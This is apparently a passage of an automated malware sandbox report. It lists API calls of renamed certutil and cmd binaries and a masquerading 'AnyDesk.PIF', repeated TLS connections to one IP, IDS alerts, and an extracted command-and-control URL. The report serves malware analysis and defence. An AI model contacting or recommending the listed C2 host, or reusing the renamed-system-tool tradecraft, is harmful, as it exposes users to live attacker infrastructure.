      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C53E914 CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,GetLastError,GetLastError,GetLastError,#357,CryptDestroyHash,6_2_00007FF67C53E914
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4CA8CC CryptFindLocalizedName,CertEnumCertificatesInStore,CertFindCertificateInStore,CertGetCRLContextProperty,#357,#357,#357,CertEnumCertificatesInStore,6_2_00007FF67C4CA8CC
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5508EC BCryptGetProperty,#205,#359,#357,#357,6_2_00007FF67C5508EC
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5761AC SysStringLen,SysStringLen,CryptStringToBinaryW,GetLastError,#357,6_2_00007FF67C5761AC
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C51417C #360,#360,#359,#357,#357,#357,#357,CryptDestroyKey,CryptGetUserKey,GetLastError,#358,LocalFree,LocalFree,LocalFree,CryptDestroyKey,6_2_00007FF67C51417C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4F21A4 #360,#359,#357,#357,BCryptFreeBuffer,6_2_00007FF67C4F21A4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C536194 CryptQueryObject,GetLastError,CertEnumCertificatesInStore,CertAddStoreToCollection,GetLastError,#357,CertCloseStore,CertFreeCertificateContext,6_2_00007FF67C536194
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5B613C CryptDecodeObjectEx,6_2_00007FF67C5B613C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C54E1F8 CertSaveStore,GetLastError,LocalAlloc,#357,CertSaveStore,GetLastError,#357,LocalFree,#357,#357,NCryptOpenStorageProvider,NCryptImportKey,NCryptSetProperty,NCryptFinalizeKey,LocalFree,LocalFree,NCryptFreeObject,6_2_00007FF67C54E1F8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C58A1F8 LocalAlloc,CryptEnumProvidersA,GetLastError,#358,LocalFree,#357,6_2_00007FF67C58A1F8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5B6214 CryptDecodeObjectEx,CryptDecodeObjectEx,SetLastError,6_2_00007FF67C5B6214
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C53A1E8 LocalFree,CryptHashCertificate2,CertGetCRLContextProperty,CertGetNameStringA,memmove,memmove,GetLastError,GetLastError,#357,GetLastError,#357,GetLastError,GetLastError,GetLastError,#357,LocalFree,memmove,GetLastError,#357,GetLastError,#359,LocalFree,6_2_00007FF67C53A1E8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C588298 #357,CryptFindOIDInfo,LocalAlloc,#357,memmove,6_2_00007FF67C588298
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C572278 CryptAcquireContextW,GetLastError,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,LocalAlloc,memmove,#357,#357,CryptDestroyHash,CryptReleaseContext,6_2_00007FF67C572278
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C526280 #357,#254,#357,CertGetCRLContextProperty,GetLastError,memcmp,#254,#357,#360,#360,CertGetPublicKeyLength,GetLastError,#359,strcmp,GetLastError,CryptFindOIDInfo,#357,LocalFree,CryptFindOIDInfo,#357,#357,#359,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,6_2_00007FF67C526280
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C57E274 GetLastError,#358,CryptAcquireCertificatePrivateKey,GetLastError,#357,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#357,LocalFree,NCryptIsKeyHandle,GetLastError,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,6_2_00007FF67C57E274
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4F0300 NCryptOpenStorageProvider,#357,#357,#357,#357,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,NCryptFreeObject,#357,6_2_00007FF67C4F0300
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5BA2E0 NCryptOpenStorageProvider,NCryptOpenKey,NCryptFreeObject,6_2_00007FF67C5BA2E0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4DE3B0 #357,#357,CryptDecodeObject,LocalFree,6_2_00007FF67C4DE3B0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C542358 #357,#357,CryptReleaseContext,CryptReleaseContext,CertFreeCertificateContext,CertFreeCertificateContext,6_2_00007FF67C542358
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C546374 memset,#358,#357,LocalFree,LocalFree,#357,#357,_strlwr,#357,LocalFree,LocalFree,lstrcmpW,#359,#359,#357,CryptAcquireContextW,GetLastError,#256,CryptGenRandom,GetLastError,#254,#357,fopen,fopen,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,LocalAlloc,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,#357,LocalFree,#357,fprintf,fprintf,CertOpenStore,GetLastError,LocalAlloc,CertSaveStore,GetLastError,#357,CertCloseStore,CertFreeCertificateContext,CertFreeCertificateContext,fclose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptDestroyKey,CryptReleaseContext,CryptReleaseContext,fprintf,fprintf,fflush,ferror,6_2_00007FF67C546374
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4D4410 GetUserDefaultUILanguage,GetSystemDefaultUILanguage,#357,#357,CryptFindOIDInfo,CryptEnumOIDInfo,#360,CryptFindOIDInfo,CryptFindOIDInfo,CryptFindOIDInfo,CryptEnumOIDInfo,#258,#358,#357,#357,#357,LocalFree,#224,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,6_2_00007FF67C4D4410
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C588404 GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,6_2_00007FF67C588404
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4F23E8 BCryptResolveProviders,#360,#360,BCryptFreeBuffer,6_2_00007FF67C4F23E8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C548488 #357,CertGetCertificateChain,GetLastError,LocalAlloc,CertGetCRLContextProperty,GetLastError,GetLastError,GetLastError,CryptAcquireContextW,GetLastError,memset,CryptMsgOpenToEncode,GetLastError,CryptMsgUpdate,GetLastError,#357,#357,CryptReleaseContext,CryptMsgClose,CertCloseStore,CertFreeCertificateChain,LocalFree,LocalFree,LocalFree,6_2_00007FF67C548488
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C52C450 CertOpenStore,GetLastError,#357,CryptQueryObject,CertAddStoreToCollection,GetLastError,#357,CertAddStoreToCollection,GetLastError,CertOpenStore,GetLastError,CertAddStoreToCollection,GetLastError,CertCloseStore,CertCloseStore,CertCloseStore,CertCloseStore,6_2_00007FF67C52C450
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C52A450 #357,#358,#357,#223,SetLastError,SetLastError,memmove,memmove,#357,#357,GetLastError,#357,#357,strcmp,GetLastError,strcmp,strcmp,strcmp,qsort,#357,CompareFileTime,CompareFileTime,#357,#357,CertFreeCertificateContext,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertCloseStore,CertCloseStore,CertFreeCTLContext,LocalFree,free,6_2_00007FF67C52A450
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4DC514 CryptGetProvParam,SetLastError,LocalAlloc,LocalFree,6_2_00007FF67C4DC514
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C57E516 ??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalFree,NCryptIsKeyHandle,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,6_2_00007FF67C57E516
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4C44E0 #357,#256,#357,GetLastError,CryptImportPublicKeyInfoEx2,GetLastError,CryptHashCertificate2,GetLastError,#357,LocalAlloc,GetLastError,memmove,BCryptVerifySignature,BCryptVerifySignature,BCryptDestroyKey,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,6_2_00007FF67C4C44E0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5224D4 #357,CertCompareCertificateName,CertCompareCertificateName,GetSystemTime,SystemTimeToFileTime,GetLastError,#357,CompareFileTime,CompareFileTime,CompareFileTime,CompareFileTime,CryptVerifyCertificateSignature,GetLastError,#357,strcmp,strcmp,#357,#357,#357,CertCompareCertificateName,#357,CertCompareCertificateName,#357,CertFreeCTLContext,6_2_00007FF67C5224D4
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49731 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49733 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49735 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49737 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49739 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49741 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49744 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49748 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49752 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49755 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49757 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49759 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49761 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49763 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49765 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49767 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49769 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49771 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49773 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49775 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49777 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49779 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49781 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49783 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49785 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49789 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49796 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49803 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49810 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49817 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49824 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49831 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49838 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49845 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49852 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49859 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49866 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49870 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49876 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49881 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49887 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49894 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49900 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49907 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49914 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49921 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49928 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49935 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49942 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49949 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49955 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49962 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49969 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49976 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49983 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.4:49990 version: TLS 1.2
      Source: Binary string: easinvoker.pdb source: AnyDesk.PIF, AnyDesk.PIF, 00000009.00000003.1719853566.000000007FA90000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1720758818.000000007F880000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.2942456888.0000000002B8E000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: cmd.pdbUGP source: alpha.exe, 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000003.00000000.1694923446.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000000.1698590707.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000007.00000000.1703554618.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000007.00000002.1717188834.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000000.1718131539.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000002.1719120301.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000000.1719455704.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000002.1720271096.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe.2.dr
      Source: Binary string: certutil.pdb source: kn.exe, 00000006.00000000.1699078959.00007FF67C5CE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000002.1702405563.00007FF67C5CE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1704266482.00007FF67C5CE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1716584582.00007FF67C5CE000.00000002.00000001.01000000.00000005.sdmp, kn.exe.4.dr
      Source: Binary string: cmd.pdb source: alpha.exe, 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000003.00000000.1694923446.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000000.1698590707.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000007.00000000.1703554618.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000007.00000002.1717188834.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000000.1718131539.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000002.1719120301.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000000.1719455704.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000002.1720271096.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe.2.dr
      Source: Binary string: easinvoker.pdbGCTL source: AnyDesk.PIF, 00000009.00000003.1720468167.0000000002927000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1719853566.000000007FA90000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1720758818.000000007F880000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.2942456888.0000000002B8E000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.2941867830.0000000002921000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: certutil.pdbGCTL source: kn.exe, 00000006.00000000.1699078959.00007FF67C5CE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000002.1702405563.00007FF67C5CE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1704266482.00007FF67C5CE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1716584582.00007FF67C5CE000.00000002.00000001.01000000.00000005.sdmp, kn.exe.4.dr
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DC823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,3_2_00007FF7E1DC823C
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DC2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,3_2_00007FF7E1DC2978
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DB35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,3_2_00007FF7E1DB35B8
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DB1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,3_2_00007FF7E1DB1560
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DD7B4C FindFirstFileW,FindNextFileW,FindClose,3_2_00007FF7E1DD7B4C
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DC823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,5_2_00007FF7E1DC823C
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DC2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,5_2_00007FF7E1DC2978
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DB35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,5_2_00007FF7E1DB35B8
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DB1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,5_2_00007FF7E1DB1560
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DD7B4C FindFirstFileW,FindNextFileW,FindClose,5_2_00007FF7E1DD7B4C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C535E58 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,6_2_00007FF67C535E58
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5919F8 #359,FindFirstFileW,FindNextFileW,FindClose,6_2_00007FF67C5919F8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C591B04 FindFirstFileW,GetLastError,#357,#359,DeleteFileW,FindNextFileW,FindClose,#359,6_2_00007FF67C591B04
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C53DBC0 FindFirstFileW,GetLastError,CertOpenStore,CertAddStoreToCollection,CertCloseStore,FindNextFileW,GetLastError,GetLastError,#357,GetLastError,GetLastError,#357,LocalFree,CertCloseStore,CertCloseStore,FindClose,6_2_00007FF67C53DBC0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C573674 #357,LocalAlloc,#357,wcsrchr,FindFirstFileW,GetLastError,#359,lstrcmpW,lstrcmpW,#359,RemoveDirectoryW,GetLastError,#359,#359,FindNextFileW,FindClose,LocalFree,LocalFree,DeleteFileW,GetLastError,#359,6_2_00007FF67C573674
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C53B3D8 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,I_CryptCreateLruCache,GetLastError,I_CryptCreateLruCache,GetLastError,#357,6_2_00007FF67C53B3D8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C53D4A4 CreateSemaphoreW,GetLastError,CreateEventW,GetLastError,GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,CloseHandle,CloseHandle,6_2_00007FF67C53D4A4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4FD440 GetFileAttributesW,#357,#357,#357,FindFirstFileW,LocalFree,#357,FindNextFileW,#357,LocalFree,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,6_2_00007FF67C4FD440
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C596F80 #359,FindFirstFileW,FindNextFileW,FindClose,LocalAlloc,#357,6_2_00007FF67C596F80
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C593100 #357,FindFirstFileW,#359,FindNextFileW,FindClose,LocalFree,#357,6_2_00007FF67C593100
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5910C4 #357,FindFirstFileW,LocalFree,FindNextFileW,FindClose,LocalFree,#357,6_2_00007FF67C5910C4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C52C6F8 memset,qsort,#357,FindFirstFileW,GetLastError,bsearch,LocalAlloc,LocalReAlloc,LocalAlloc,FindNextFileW,GetLastError,DeleteFileW,GetLastError,#359,#357,FindClose,LocalFree,LocalFree,6_2_00007FF67C52C6F8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C59234C wcschr,#357,#357,#359,FindFirstFileW,wcsrchr,_wcsnicmp,iswxdigit,wcstoul,FindNextFileW,#359,#359,#357,#357,LocalFree,LocalFree,FindClose,6_2_00007FF67C59234C
      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02B65908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,9_2_02B65908
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DC823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,10_2_00007FF7E1DC823C
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DC2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,10_2_00007FF7E1DC2978
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DB35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,10_2_00007FF7E1DB35B8
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DB1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,10_2_00007FF7E1DB1560
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DD7B4C FindFirstFileW,FindNextFileW,FindClose,10_2_00007FF7E1DD7B4C

      Networking

      barindex
      C2 URLs / IPs found in malware configuration
      Source: Malware configuration extractorURLs: https://vandeytas.ru.com/233_Hlvzmhuinff
      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02B7E4B8 InternetCheckConnectionA,9_2_02B7E4B8
      Source: Joe Sandbox ViewIP Address: 50.7.187.218 50.7.187.218
      Source: Joe Sandbox ViewASN Name: COGENT-174US COGENT-174US
      Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49741 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49748 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49752 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49779 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49757 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49765 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49781 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49755 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49783 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49759 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49763 -> 50.7.187.218:443
